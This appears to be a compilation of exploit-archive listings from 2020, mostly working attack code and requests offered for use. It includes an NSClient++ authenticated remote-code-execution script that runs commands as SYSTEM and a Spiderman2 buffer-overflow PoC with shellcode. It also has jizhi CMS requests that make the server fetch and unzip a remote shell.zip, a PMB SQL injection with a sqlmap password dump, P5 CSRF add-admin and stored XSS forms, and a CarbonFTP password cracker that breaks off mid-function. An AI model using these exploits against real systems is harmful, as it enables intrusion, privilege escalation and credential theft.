
NSClient++ 0.5.2.35 Authenticated Remote Code Execution


NSClient++ version 0.5.2.35 suffers from an authenticated remote code execution vulnerability.


MD5 | 68ce84ab7e7e2791a90fa81b059e375a

# Exploit Title: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-04-20
# Exploit Author: kindredsec
# Vendor Homepage: https://nsclient.org/
# Software Link: https://nsclient.org/download/
# Version: 0.5.2.35
# Tested on: Microsoft Windows 10 Pro (x64)
# CVE: N/A
#
# NSClient++ is a monitoring agent that can run external scripts.
# Given valid credentials (the web-interface password), an attacker can register a
# new external script containing an arbitrary command through the NSClient++ web
# application and then invoke it. Because the service runs as NT AUTHORITY\SYSTEM by
# default, this yields privileged code execution.

#!/usr/bin/env python3

import requests
from bs4 import BeautifulSoup as bs
import urllib3
import json
import sys
import random
import string
import time
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def generateName():
    """Return a random alphabetic name of 8 to 13 ASCII letters.

    The name becomes the key of the external script registered on the
    target, so it only has to be unlikely to collide with an existing
    entry; it is not a secret, which is why ``random`` is adequate.
    """
    alphabet = string.ascii_letters
    length = random.randint(8, 13)
    return ''.join(random.choices(alphabet, k=length))

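def printStatus(message, msg_type):
    """Print ``message`` behind a coloured status tag.

    Args:
        message: text to print. It follows the tag with no separator,
            which preserves the original output format exactly.
        msg_type: ``"good"`` (green ``[+]``), ``"info"`` (yellow ``[!]``)
            or ``"bad"`` (red ``[-]``).

    Raises:
        ValueError: for any other ``msg_type``. The original reached the
            ``print`` with its local unbound and died with an
            UnboundLocalError instead; the failure is now explicit.
    """
    C_RESET = '\033[0m'
    # Colour code and tag per message class; only the tag is coloured.
    tags = {
        "good": ('\033[1;32m', "[+]"),
        "info": ('\033[1;33m', "[!]"),
        "bad": ('\033[1;31m', "[-]"),
    }
    try:
        colour, tag = tags[msg_type]
    except KeyError:
        raise ValueError("unknown msg_type: %r" % (msg_type,)) from None
    print(colour + tag + C_RESET + message)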


# This function adds a new external script containing the desired
# command, then saves the configuration
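def configurePayload(session, cmd, key):
    """Register ``cmd`` as external script ``key`` on the target and save.

    Two ``SettingsRequestMessage`` posts go to ``/settings/query.json``
    under the module-level ``base_url``: an ``update`` that writes
    ``/settings/external scripts/scripts/<key> = <cmd>``, then a ``SAVE``
    control command so the entry survives the reload that follows.

    Args:
        session: ``requests.Session`` already carrying the TOKEN header.
        cmd: command line the agent will run; it is stored verbatim.
        key: script name, later invoked as ``/query/<key>``.

    Exits with status 1 when the update is not acknowledged with
    ``STATUS_OK``. The SAVE reply is inspected as well (the original
    ignored it) but only produces a warning, since it is not confirmed
    here that SAVE uses the same ``STATUS_OK`` marker.
    """
    printStatus("Configuring Script with Specified Payload . . .", "info")
    endpoint = "/settings/query.json"
    node = {"path": "/settings/external scripts/scripts", "key": key}
    update = {"node": node, "value": {"string_data": cmd}}
    payload = [{"plugin_id": "1234", "update": update}]
    json_data = {"type": "SettingsRequestMessage", "payload": payload}

    out = session.post(url=base_url + endpoint, json=json_data, verify=False)
    if "STATUS_OK" not in str(out.content):
        printStatus("Error configuring payload. Hit error at: " + endpoint, "bad")
        sys.exit(1)

    printStatus("Added External Script (name: " + key + ")", "good")
    time.sleep(3)
    printStatus("Saving Configuration . . .", "info")
    header = {"version": "1"}
    payload = [{"plugin_id": "1234", "control": {"command": "SAVE"}}]
    json_data = {"header": header, "type": "SettingsRequestMessage", "payload": payload}

    out = session.post(url=base_url + endpoint, json=json_data, verify=False)
    # An unsaved configuration is silently lost on reload and the later
    # /query/<key> call then fails with no hint why, so at least warn.
    if "STATUS_OK" not in str(out.content):
        printStatus("SAVE reply did not contain STATUS_OK; the script may not persist across the reload", "info")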


# Since the application needs to be restarted after making changes,
# this function reloads the application, and waits for it to come back.
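def reloadConfig(session):
    """Ask NSClient++ to reload (``GET /core/reload``) and wait for it.

    After a 10 s grace period the module-level ``base_url`` is polled
    until a response with a non-empty body arrives. Polls are spaced
    10 s apart, as the original comment promised: a refused connection
    raises immediately (``timeout`` only bounds a slow reply), so without
    the sleep the ten retries were exhausted in well under a second and
    the exploit aborted on any restart slower than the grace period.

    Only ``requests`` transport errors count as "still restarting"; the
    original bare ``except:`` also swallowed KeyboardInterrupt. Gives up
    with exit status 1 after eleven failed polls, like the original.
    """
    printStatus("Reloading Application . . .", "info")
    endpoint = "/core/reload"
    try:
        session.get(url=base_url + endpoint, verify=False)
    except requests.exceptions.RequestException:
        # The service may drop the connection while it restarts; that is
        # not a failure of the reload itself, so fall through to polling.
        pass

    printStatus("Waiting for Application to reload . . .", "info")
    time.sleep(10)
    poll_interval = 10
    failures = 0
    while True:
        try:
            out = session.get(url=base_url, verify=False, timeout=10)
        except requests.exceptions.RequestException:
            failures += 1
            if failures > 10:
                printStatus("Application failed to reload. Nice DoS exploit! /s", "bad")
                sys.exit(1)
            time.sleep(poll_interval)
            continue
        if len(out.content) > 0:
            return
        # Reachable but empty reply: treat as not ready yet and keep polling.
        time.sleep(poll_interval)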


# This function makes the call to the new external script to
# ultimately execute the code.
def triggerPayload(session, key):
    """Invoke the registered script through ``GET /query/<key>``.

    The request presumably blocks while the agent runs the command, so a
    read timeout is taken as "the payload is running" and the script
    exits 0. Any other outcome simply returns to the caller.
    """
    printStatus("Triggering payload, should execute shortly . . .", "info")
    query_url = base_url + "/query/" + key
    try:
        session.get(url=query_url, verify=False, timeout=10)
    except requests.exceptions.ReadTimeout:
        printStatus("Timeout exceeded. Assuming your payload executed . . .", "info")
        sys.exit(0)


# Before setting up the exploit, this function makes sure the
# required feature (External Scripts) is enabled on the application.
def enableFeature(session):
    """Load the ``CheckExternalScripts`` module via the registry API.

    Sends ``GET /registry/control/module/load?name=CheckExternalScripts``
    to the module-level ``base_url`` and exits with status 1 unless the
    reply body contains ``STATUS_OK``.
    """
    printStatus("Enabling External Scripts Module . . .", "info")
    endpoint = "/registry/control/module/load"
    reply = session.get(url=base_url + endpoint,
                        params={"name": "CheckExternalScripts"},
                        verify=False)
    if "STATUS_OK" in str(reply.content):
        return
    printStatus("Error enabling required feature. Hit error at: " + endpoint, "bad")
    sys.exit(1)


# This function obtains an authentication token that gets added to all
# remaining headers.
def getAuthToken(session):
    """Exchange the module-level ``password`` for an API token.

    Calls ``GET /auth/token?password=...`` on ``base_url`` and returns
    the ``auth token`` field of the JSON reply; exits with status 1 when
    that field is missing (wrong password or some other error body).

    Operational caveat: the password is sent as a query-string parameter,
    so it lands in any proxy or server access log, and ``verify=False``
    means an on-path attacker can read it. The token is also echoed to
    the terminal. Use only against hosts you are authorised to test.
    """
    printStatus("Obtaining Authentication Token . . .", "info")
    endpoint = "/auth/token"
    reply = session.get(url=base_url + endpoint,
                        params={"password": password},
                        verify=False)
    if "auth token" not in str(reply.content):
        printStatus("Error obtaining auth token, is your password correct? Hit error at: " + endpoint, "bad")
        sys.exit(1)
    token = json.loads(reply.content)["auth token"]
    printStatus("Got auth token: " + token, "good")
    return token



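def main():
    """Parse the command line and run the exploit end to end.

    Sequence: token -> load CheckExternalScripts -> register script ->
    save + reload -> fresh token (the reload invalidates the first one)
    -> ``GET /query/<name>``. The helper functions read ``base_url`` and
    ``password`` as module globals, so both are assigned here.

    All four options are required: the published ``len(sys.argv) < 4``
    guard let a missing option through as ``None`` and the script then
    died on string concatenation. Note that ``-p`` puts the password on
    the command line, where process listings and shell history can see it.
    """
    global base_url, password

    parser = argparse.ArgumentParser("NSClient++ 0.5.2.35 Authenticated RCE")
    parser.add_argument('-t', nargs='?', metavar='target', help='Target IP Address.')
    parser.add_argument('-P', nargs='?', metavar='port', help='Target Port.')
    parser.add_argument('-p', nargs='?', metavar='password', help='NSClient++ Administrative Password.')
    parser.add_argument('-c', nargs='?', metavar='command', help='Command to execute on target')
    args = parser.parse_args()

    if None in (args.t, args.P, args.p, args.c):
        parser.print_help()
        sys.exit(1)

    # Build base URL, grab needed arguments
    base_url = "https://" + args.t + ":" + args.P
    printStatus("Targeting base URL " + base_url, "info")
    password = args.p
    cmd = args.c

    # First auth token goes into the session headers for all later calls.
    s = requests.session()
    s.headers.update({"TOKEN": getAuthToken(s)})

    # Random script name, enable the feature, add the payload, reload.
    randKey = generateName()
    enableFeature(s)
    configurePayload(s, cmd, randKey)
    reloadConfig(s)

    # The reload invalidated the first token; fetch a new one.
    s.headers.update({"TOKEN": getAuthToken(s)})

    # Execute our code.
    triggerPayload(s, randKey)


if __name__ == "__main__":
    main()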


Spiderman2 2.1.1 Buffer Overflow


Spiderman2 version 2.1.1 suffers from a buffer overflow vulnerability.


MD5 | 72b8f45c1f4a3f5253daa9b1399b79dd

# Exploit Title: Spiderman2 2.1.1 - Buffer Overflow
# Exploit Author: HexraiN
# Vendor Homepage: https://www.mobygames.com/company/fizz-factor
# Software Link: https://www.mobygames.com/game/spider-man-2-the-game
# Version: 2.1.1
# Tested on: Windows 10 x64
# Greetz : OA Cybersecurity Labs

#Twitter : @smashedkernel

# 1 -> Disable DEP for Spiderman.exe
# 2 -> Delete <install dir>\Movies\ACTIVISN.bik (the PoC rewrites this file)
# 3 -> Replace the shellcode with the one you want
# 4 -> Set "installation_path" to your install directory
# 5 -> Compile & run the PoC
# 6 -> Launch Spiderman.exe
# 7 -> Boom


#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

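/*
 * Payload embedded in the crafted ACTIVISN.bik (192 bytes).
 *
 * The published header said it came from
 *   msfvenom -p windows/exec CMD=notepad -e x64/alpha_mixed -f c -v
 * but that cannot be right as written: alpha_mixed output is printable
 * ASCII, whereas these bytes are not, and they open with the familiar
 * unencoded 32-bit stub (fc e8 82 00 00 00 60 89 e5 ...) and end with
 * the clear-text string "notepad". NOTE(review): regenerate the payload
 * for your target rather than trusting the encoder claim.
 *
 * The original listed that msfvenom line as a '#' line inside the
 * initializer, which is not valid C; it is a comment here so the file
 * compiles. sizeof(shellcode) is 193: 192 bytes plus the literal's NUL.
 */
unsigned char shellcode[] =
    "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
    "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
    "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
    "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
    "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
    "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
    "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
    "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
    "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
    "\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
    "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
    "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
    "\x00\x53\xff\xd5\x6e\x6f\x74\x65\x70\x61\x64\x00";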



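/*
 * Write the crafted ACTIVISN.bik: 421 bytes of NOP sled with a 4-byte
 * return address at offset 28 and the shellcode at the end. The game
 * reads the file on start-up (header step 6), which triggers the
 * overflow.
 *
 * Fixes over the published listing, none of which change the file
 * layout: a real char buffer for the path (the original declared an
 * array of pointers and then strcpy'd over a string literal instead of
 * appending to it), a string literal that no longer spans a line break,
 * fopen() in binary mode so Windows does not translate bytes, a fixed
 * 32-bit return address instead of the platform-dependent sizeof(long),
 * and error checks on the file operations.
 *
 * Returns 0 on success, 1 on failure.
 */
int main(void)
{
    /* Header step 4: point this at the game's install directory. */
    static const char installation_path[] =
        "C:\\Program Files (x86)\\Activision\\Spider-Man 2";
    static const char movie_rel[] = "\\Movies\\ACTIVISN.bik";
    char target_path[512];
    char buffer[421];
    FILE *vulnerable;

    /* NOTE(review): 0xbffff240 is a typical 32-bit Linux stack address;
     * on the stated Windows 10 x64 target it almost certainly has to be
     * re-derived in a debugger, and ASLR may defeat any fixed value.
     * The +0xc0 lands roughly 192 bytes into the NOP sled. */
    uint32_t addr = 0xbffff240 + 0xc0;

    if (snprintf(target_path, sizeof target_path, "%s%s",
                 installation_path, movie_rel) >= (int)sizeof target_path) {
        fprintf(stderr, "install path too long\n");
        return 1;
    }
    if (sizeof(shellcode) + 1 > sizeof buffer) {
        fprintf(stderr, "shellcode does not fit in the buffer\n");
        return 1;
    }

    memset(buffer, 0x90, sizeof buffer);

    /* Offset 28 is where the saved return address sits (the original
     * comment said "rip"; a 4-byte overwrite means EIP on a 32-bit game). */
    memcpy(buffer + 28, &addr, sizeof addr);

    /* Same placement as the original: the copy includes the literal's
     * terminating NUL, leaving the very last byte of the buffer as a NOP. */
    memcpy(buffer + sizeof buffer - sizeof(shellcode) - 1, shellcode,
           sizeof(shellcode));

    vulnerable = fopen(target_path, "wb");
    if (vulnerable == NULL) {
        perror(target_path);
        return 1;
    }
    if (fwrite(buffer, 1, sizeof buffer, vulnerable) != sizeof buffer) {
        perror("fwrite");
        fclose(vulnerable);
        return 1;
    }
    if (fclose(vulnerable) != 0) {
        perror("fclose");
        return 1;
    }
    return 0;
}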

jizhi CMS 1.6.7 Arbitrary File Download


jizhi CMS version 1.6.7 suffers from an arbitrary file download vulnerability: the authenticated plugin-update endpoint fetches an attacker-supplied URL onto the server and then extracts the archive (see the two requests below).


MD5 | ad568dbe47d72686d13f81d317694b8a

# Exploit Title: jizhi CMS 1.6.7 - Arbitrary File Download
# Google Dork: jizhicms
# Date: 2020-04-18
# Exploit Author: iej1ctk1g
# Vendor Homepage: https://www.jizhicms.cn/
# Software Link: http://down.jizhicms.cn/jizhicms_Beta1.6.7.zip
# Version: 1.6.7
# Tested on: Mac OS
# CVE : N/A

Request 1 — have the plugin updater fetch a remote archive (`download_url`; the host below is the author's, replace it with your own) and store it under the name given by `filepath`. The request goes to the admin controller and needs a valid admin `PHPSESSID`:

POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.253:8888
Content-Length: 86
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.253:8888
Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close

action=start-download&filepath=shell&download_url=http://39.105.143.130:9090/shell.zip


Request 2 — extract the archive fetched in request 1 (`action=file-upzip`, same `filepath`), which places its contents on the server:

POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.253:8888
Content-Length: 32
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.253:8888
Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close

action=file-upzip&filepath=shell

Sysaid 20.1.11 b26 Remote Command Execution


Sysaid version 20.1.11 b26 suffers from an AJP13 remote command execution vulnerability.


MD5 | aa02b3b8eb6735d2b6c2a11c9efc3402

# Exploit Title: Sysaid 20.1.11 b26 - Remote Command Execution
# Google Dork: intext:"Help Desk Software by SysAid <http://www.sysaid.com/>"
# Date: 2020-03-09
# Exploit Author: Ahmed Sherif
# Vendor Homepage: https://www.sysaid.com/free-help-desk-software
# Software Link: [https://www.sysaid.com/free-help-desk-software
# Version: Sysaid v20.1.11 b26
# Tested on: Windows Server 2016
# CVE : CVE-2020-10569

GhostCat Attack

The default installation of SysAid exposes the AJP13 connector of its bundled Tomcat instance to the network. This is the Tomcat "Ghostcat" issue that was recently covered on several blog posts, e.g.
<https://www.zdnet.com/article/ghostcat-bug-impacts-all-apache-tomcat-versions-released-in-the-last-13-years/>.


*Proof-of-Concept*

[image: image.png — screenshot not reproduced in this text copy]

*Unauthenticated File Upload*
It was found that an attacker can upload files to the SysAid application
without authentication by accessing the following URL directly:
http://REDACTED:8080/UploadIcon.jsp?uploadChatFile=true&parent=



The screenshot referenced above (not reproduced in this text copy) shows an attacker executing commands on the system without any prior authentication — presumably by combining the unauthenticated upload with the exposed AJP connector, although the advisory does not spell the chain out.

PMB 5.6 SQL Injection


PMB version 5.6 suffers from a remote SQL injection vulnerability.


MD5 | 0c69bdd7b85530a8fbd9d3ae78931726

# Exploit Title: PMB 5.6 - 'logid' SQL Injection
# Google Dork: inurl:opac_css
# Date: 2020-04-20
# Exploit Author: 41-trk (Tarik Bakir)
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6

-==== Software Description ====-

PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products.
We are some librarians, users and developers deploring this state of affairs.

PMB is based on web technology. This is what we sometimes call a 'web-app'.
PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.

The main functions of PMB are :

* Supporting the UNIMARC format
* Authorities management (authors, publishers, series, subjects...)
* Management of loans, holds, borrowers...
* A user-friendly configuration
* The ability to import full bibliographic records
* A user-friendly OPAC integrating a browser
* Loans management with a module designed to serve even the very small establishments
* Serials management
* Simple administration procedures that can be handled easily even by the library staff...

-==== Vulnerability ====-

The `$logid` variable in `/admin/sauvegarde/download.php` is used without proper sanitisation, which allows a logged-in user holding ADMINISTRATION_AUTH rights to execute arbitrary SQL via the `logid` GET parameter (the PoC below targets `logid`, not `id`).

-==== POC ====-

http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1 [SQLI]

Using SQLMAP :

./sqlmap.py -u "http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1" -p logid --headers="Cookie: [VALID_USER_COOKIE]" --passwords

-==== Exploit requirements ====-

- You will need to be logged in in order to exploit the vulnerability.

P5 FNIP-8x16A/FNIP-4xSH CSRF / Cross Site Scripting


P5 FNIP-8x16A / FNIP-4xSH versions 1.0.20 and 1.0.11 suffer from cross site request forgery and cross site scripting vulnerabilities.


MD5 | 1c782b6ec67ea3314c3e252545f9fbdf

<!--


P5 FNIP-8x16A/FNIP-4xSH CSRF Stored Cross-Site Scripting


Vendor: P5
Product web page: https://www.p5.hu
Affected version: 1.0.20, 1.0.11

Summary: The FNIP-8x16A is an eight channel relay module used for switching any
type of load that doesn’t exceed the specifications. Via its built-in web site
and TCP/IP communication, the outputs and inputs can be controlled and monitored
from standard network capable devices such as computers, smartphones, web-tablets,
etc. either locally or via the network. The module can be used independently or
as part of a complex control system in residential and commercial installations.

Desc: The controller suffers from CSRF and XSS vulnerabilities. The application
allows users to perform certain actions via HTTP requests without performing any
validity checks to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits a malicious web
site. Input passed to several GET/POST parameters is not properly sanitised before
being returned to the user. This can be exploited to execute arbitrary HTML and
script code in a user's browser session in context of an affected site.

Tested on: Linux
CGI


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2020-5564
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5564.php


29.01.2020

-->


<!-- CSRF add admin user -->
<html>
<body>
<!-- POST to user.cgi fills user slot 1 with an enabled Admin account.
     Per the advisory there is no anti-CSRF token or origin check, so a
     logged-in administrator who loads this page and submits the form
     creates the account. Submission is manual here (no auto-submit script). -->
<form action="http://192.168.1.17:83/user.cgi" method="POST">
<input type="hidden" name="uno" value="1" /> <!-- User number (user1) -->
<input type="hidden" name="un" value="testingus" /> <!-- Username -->
<input type="hidden" name="role" value="2" /> <!-- 2: Admin, 1: Actor, 0: Observer -->
<input type="hidden" name="enabled" value="1" />
<input type="hidden" name="pw" value="123456" />
<input type="hidden" name="pw2" value="123456" />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>

<!-- CSRF change admin password -->
<html>
<body>
<!-- Same endpoint, but only the username and the new password pair are
     sent; presumably user.cgi matches the existing account by "un".
     The advisory notes the factory credentials as admin:futurenow. -->
<form action="http://192.168.1.17:83/user.cgi" method="POST">
<input type="hidden" name="un" value="admin" /> <!-- Defaults: admin:futurenow -->
<input type="hidden" name="pw" value="123456" />
<input type="hidden" name="pw2" value="123456" />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>

<!-- XSS modify labels -->
<html>
<body>
<!-- Stored XSS via the channel labels: lab4 carries a payload that breaks
     out of the attribute (">) and adds a script. Delivered through the
     same CSRF weakness, so a logged-in victim stores it on the device. -->
<form action="http://192.168.1.17:83/config.html" method="POST">
<input type="hidden" name="lab1" value="Channel1" />
<input type="hidden" name="lab2" value="Channel2" />
<input type="hidden" name="lab3" value="Channel3" />
<input type="hidden" name="lab4" value='"><script>confirm(251)</script>' />
<input type="hidden" name="lab12" value="etc." />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>

Neowise CarbonFTP 1.4 Insecure Proprietary Password Encryption


Neowise CarbonFTP version 1.4 suffers from an insecure proprietary password encryption implementation. Second version of this exploit that is updated to work with Python 3.


MD5 | e7c69cbdc42341fad6f120be67f23e92

import time, string, sys, argparse, os, codecs

#Fixed: updated for Python 3, the hex decode() function was not working in Python 3 version.
#This should be compatible for Python 2 and 3 versions now, tested successfully.
#Sample test password
#LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947

# Fixed, program-wide "encryption" key of the vulnerable program
# (0x97F == 2431 decimal), and the width of each encrypted chunk.
key = "97F"
chunk_sz = 5

#Password is stored here:
#C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects\<FILE>.CFTP

#Neowise CarbonFTP v1.4
#Insecure Proprietary Password Encryption
#By John Page (aka hyp3rlinx)
#Apparition Security
#===================================================

def carbonftp_conf(conf_file):
    """Collect every encrypted password found in an open ``.CFTP`` file.

    ``conf_file`` is iterated line by line. A line containing
    ``Password=STRING|`` yields the text from two characters after the
    first ``|`` up to, but excluding, the last two characters -- the
    same slicing as the original. Each hit is printed and collected.

    Returns:
        list[str]: the extracted (still encrypted) strings; empty when
        nothing matched or when reading raised (the error is printed,
        not propagated).
    """
    found = []
    try:
        for line in conf_file:
            if line.find("Password=STRING|") == -1:
                continue
            bar = line.find("|")
            if bar == -1:
                continue
            encrypted = line[bar + 2:-2]
            print(" Password found: " + encrypted)
            found.append(encrypted)
    except Exception as err:
        print(str(err))
    return found


def reorder(lst):
    """Swap neighbouring elements pairwise from index 1 on and join.

    Positions (1,2), (3,4), (5,6), ... are exchanged in place; a pair
    whose second index falls off the end is left alone (the original
    relied on IndexError for that). Returns ``''.join(lst)``.
    """
    size = len(lst)
    for first in range(1, size, 2):
        second = first + 1
        if second >= size:
            break
        lst[first], lst[second] = lst[second], lst[first]
    return ''.join(lst)


def dec2hex(dec):
    """Return ``int(dec)`` as lowercase hex without the ``0x`` prefix.

    Accepts anything ``int()`` accepts. The prefix strip is positional,
    as in the original, so a negative value yields text starting with
    ``x`` (which the hex decoder downstream rejects).
    """
    value = int(dec)
    return hex(value)[2:]


#Updated for Python version compatibility.
def hex2ascii(h):
    """Decode a hex string to ASCII text, exiting on malformed input.

    Surrounding whitespace is stripped first. Any decode failure (odd
    length, non-hex digit, non-ASCII byte) prints a message and ends
    the process, exactly as the original did.
    """
    hexstr = h.strip()
    try:
        return codecs.decode(hexstr, "hex").decode("ascii")
    except Exception:
        print("[!] In hex2ascii(), not a valid hex string.")
        exit()


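def chunk_passwd(passwd_lst, size=None):
    """Split each encrypted password into fixed-width chunks.

    Args:
        passwd_lst: iterable of encrypted password strings.
        size: chunk width. Defaults to the module-level ``chunk_sz``
            (5), which is what the proprietary routine works on; it is
            a parameter now so the splitter can be exercised on its own.

    Returns:
        list[str]: all chunks of all passwords, in order; the final
        chunk of a password may be shorter than ``size``. Empty strings
        contribute nothing.
    """
    if size is None:
        size = chunk_sz
    return [passwd[i:i + size]
            for passwd in passwd_lst
            for i in range(0, len(passwd), size)]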


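def strip_non_printable_char(text):
    """Drop ASCII control characters (code points below 32) except TAB.

    The parameter was named ``str`` in the original, shadowing the
    builtin; the only caller in this file passes it positionally.

    Args:
        text: string to filter.

    Returns:
        str: ``text`` with every character of ordinal <= 31 removed,
        apart from ``\\t`` (ordinal 9), which is kept.
    """
    return ''.join(ch for ch in text if ord(ch) > 31 or ord(ch) == 9)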

# Cross-call state shared with deob()/decryptor(): the chunk counter
# (deob only ever raises it from 0 to 1) and the cleartext accumulated
# so far, which the callers clear between passwords.
cnt = 0
passwd_str = ""
def deob(c):
    """Decrypt one chunk ``c`` and append the result to ``passwd_str``.

    The routine subtracts ``key`` (0x97F) from ``int(c)`` and renders the
    difference in hex, i.e. it assumes each chunk is plaintext-as-hex plus
    the key. ``cnt`` decides how many hex digits are kept: the first call
    takes two (one byte) and raises ``cnt`` to 1; every later call sees
    ``cnt == 1`` and takes four. ``cnt`` is never incremented or reset
    again anywhere in this file, so the "second char" comment below
    describes the author's intent rather than the branch's behaviour, and
    in -u mode only the first chunk of the first file takes the 2-digit
    path.

    Globals: reads ``key``; reads and updates ``cnt`` and ``passwd_str``
    (the latter is cleared by decryptor()/main() between passwords).

    Returns:
        list[str]: the characters of ``passwd_str`` accumulated so far.

    Exits the process when ``c`` is not an integer string, or (via
    hex2ascii) when the hex text is undecodable -- which includes a
    negative difference, since dec2hex then yields text starting with
    ``x``.
    """
    global cnt, passwd_str

    tmp = ""

    try:
        tmp = int(c) - int(key, 16)
        tmp = dec2hex(tmp)
    except Exception as e:
        print("[!] Not a valid CarbonFTP encrypted password.")
        exit()

    b = ""
    a = ""

    # Seems we can delete the second char as its most always junk.
    # (Only the very first call takes this branch; see the docstring.)
    if cnt != 1:
        a = tmp[:2]
        cnt += 1
    else:
        b = tmp[:4]

    # Control characters are dropped before the text is accumulated.
    passwd_str += strip_non_printable_char(hex2ascii(a + b))
    hex_passwd_lst = list(passwd_str)
    return hex_passwd_lst


def no_unique_chars(lst):
    """Flag a password that looks like a single repeated character.

    Walks adjacent pairs; as soon as two neighbours are equal before any
    differing pair has been seen, prints a hint and returns ``lst[0]``.
    In effect: ``lst[0]`` when ``lst[0] == lst[1]``, otherwise ``False``
    (also for lists with fewer than two elements).
    """
    differing = 0
    for left, right in zip(lst, lst[1:]):
        if left != right:
            differing += 1
        elif differing == 0:
            print("[!] Possible one char password?: " + str(lst[0]))
            return lst[0]
    return False


def decryptor(result_lst):
    """Decrypt a list of chunks and return the cleartext guess.

    Feeds each chunk to deob() (which accumulates into the global
    ``passwd_str``), then swaps the characters back into order with
    reorder() -- which mutates ``lst`` in place, so the single-char check
    that follows sees the reordered list -- and stores the length in the
    global ``sz`` (read later by display_cracked_passwd()).

    Returns:
        str: the reordered password, or, when its length is exactly 9,
        a ``" | "``-joined string of eight prefixes of it (the
        candidates). The 9-char branch returns before ``passwd_str`` is
        cleared; main() resets it between files in -u mode. The comment
        below speaks of passwords shorter than nine characters, but the
        branch it describes triggers on ``sz == 9``.

    NOTE(review): ``lst`` is only bound inside the loop, so an empty
    ``result_lst`` raises NameError at the reorder() call.
    """
    global passwd_str, sz

    print(" Decrypting ... \n")
    for i in result_lst:
        print("[-] "+i)
        time.sleep(0.1)
        lst = deob(i)

    #Re-order chars to correct sequence using custom swap function (reorder).
    reordered_pass = reorder(lst)
    sz = len(reordered_pass)

    #Flag possible single char password.
    no_unique_chars(lst)

    print("[+] PASSWORD LENGTH: " + str(sz))
    if sz == 9:
        return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-3] + " | " + reordered_pass[:-4] + " | " +
                reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass)

    #Shorter passwords less then nine chars will have several candidates
    #as they get padded with repeating chars so we return those.

    passwd_str=""
    return reordered_pass


def display_cracked_passwd(sz, passwd):
    """Print the result; ``sz == 9`` means ``passwd`` holds candidates."""
    label = "[*] PASSWORD CANDIDATES: " if sz == 9 else "[*] DECRYPTED PASSWORD: "
    print(label + passwd + "\n")


def parse_args():
    """Parse ``sys.argv``: ``-u/--user`` to crack a user's directory of
    .CFTP files, or ``-p/--encrypted_password`` to crack one string."""
    cli = argparse.ArgumentParser()
    cli.add_argument("-u", "--user",
                     help="Username to crack a directory of Carbon .CFTP password files")
    cli.add_argument("-p", "--encrypted_password",
                     help="Crack a single encrypted password")
    return cli.parse_args()


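def main(args):
    """Run the cracker in directory mode (``-u``) or single-string mode (``-p``).

    Both modes go through chunk_passwd() -> decryptor() ->
    display_cracked_passwd() and rely on the module globals ``passwd_str``
    (accumulator, cleared between files) and ``sz`` (length set by
    decryptor()). Supplying both flags is rejected.

    Change from the published version: each config file is opened with
    ``with`` so it is closed even when decryption exits the process
    early, and the directory is no longer made the working directory.
    Output and decryption logic are unchanged.
    """
    global passwd_str, sz

    if args.user and args.encrypted_password:
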